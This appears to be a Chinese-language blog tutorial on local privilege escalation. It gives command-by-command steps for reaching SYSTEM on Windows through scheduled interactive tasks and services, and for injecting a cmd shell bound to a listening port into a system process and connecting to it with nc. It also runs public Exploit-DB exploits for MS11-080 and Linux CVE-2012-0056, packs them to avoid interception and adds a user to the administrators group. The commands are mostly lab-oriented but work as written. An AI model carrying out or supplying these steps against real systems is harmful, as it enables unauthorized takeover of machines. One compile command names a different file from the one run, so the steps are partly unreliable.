提权

关于提权

本地提权

  • 已实现本地低权限账号登录
    •远程溢出
    •直接获得账号密码
  • 希望获取更高权限
    •实现对目标进一步控制
  • 系统账号之间权限隔离
    •操作系统安全的基础
    •用户空间
    •内核空间
  • 系统账号
    • 用户账号登陆时获取权限令牌
    • 服务账号无需用户登陆已在后台启动服务

系统权限类型

  • Windows
    • user
    • Administrator
    • System
  • Linux
    • User
    • Root

将administrator用户提升为system用户
使用

1
at xx:xx /interactive cmd #在某时弹出命令行窗口

1.PNG
这里的命令行窗口则是属于system权限的了,通过这个窗口运行的命令就都属于system用户下的。 #这个方法在win 2003/xp中有效
2.png
使用

1
sc Create syscmd binPath= "cmd /K start" type= own type= interact #创建一个服务,其作用是打开一个cmd

1
sc start syscmd #启动服务,弹出一个具有system权限的cmd

3.png
注:win7能用,win8取消交互服务不能用。
注入进程提权
将我的进程注入进具有system权限的进程,那么我的进程也就具有了system账号的权限
使用pinjecto工具注入进程,(这里是官网,翻墙使用)

1
pinjector.exe -l #查看当前可注入进程

4.PNG

1
pinjector.exe -p PID cmd 5555 #将自己的进程注入进系统进程,同时侦听端口

5.PNG

1
nc -nv 192.168.67.129 5555 #使用nc来连接端口

6.PNG
注:此方法十分隐蔽φ(>ω<*)

利用漏洞提权
Windows
从低权限用户提升到高权限用户
Ms11-080

1
searchsploit ms11-080 #查询漏洞

7.PNG
复制到当前目录

1
cp /usr/share/exploitdb/exploits/windows/local/18176.py .

这个漏洞利用代码支持XPSP/2003SP2 英文版(在中文版环境下执行,蓝屏重启,是一个dos攻击)
8.png
将18176.py传输到靶机中
9.png
Pyinstaller的功能是将py文件转换成exe执行程序
先安装Pywin32(pywin32-219.win32-py2.7.exe)

1
pyinstaller -F 18176.py #在dist文件夹中

10png.png
避免被拦截,可将程序压缩发送。以上步骤可以在本机完成,完成将exe上传至靶机。
创建一个低权限用户

1
net user test test /add #创建密码为test的test用户

使用test用户登录并执行18176.exe

1
18176.exe -O xp

11.png
获取权限,并把自己加入管理员组,从而提升权限

1
net localgroup administrators test /add

12.png
Linux
CVE-2012-0056
/proc/pid/mem是一个用于读取和写入,直接通过各地寻求与相同的地址作为该进程的虚拟内存空间进程内存的接口。
linux内核>=2.6.39都存在此漏洞,3.2.2以上没有了(━━∑( ̄□ ̄*|||━━),该漏洞详细说明在这里
14.png

1
uname -a 查询内核版本号

确定靶机内核版本号

1
searchsploit 18411.c #查询漏洞利用脚本

将18411.c上传至靶机并编译

1
2
3
4
scp /usr/share/exploitdb/exploits/linux/local/18411.c lanbai@192.168.1.145:/home/lanbai/ #上传
gcc 18411.c -o exp #编译
chmod 777 18411.exp #添加权限
./18411.exp #执行

到此结束

如有错误请联系lanbaidetanlang@qq.com
1541519100610.jpeg

文章目录
  1. 1. 关于提权
  2. 2. 到此结束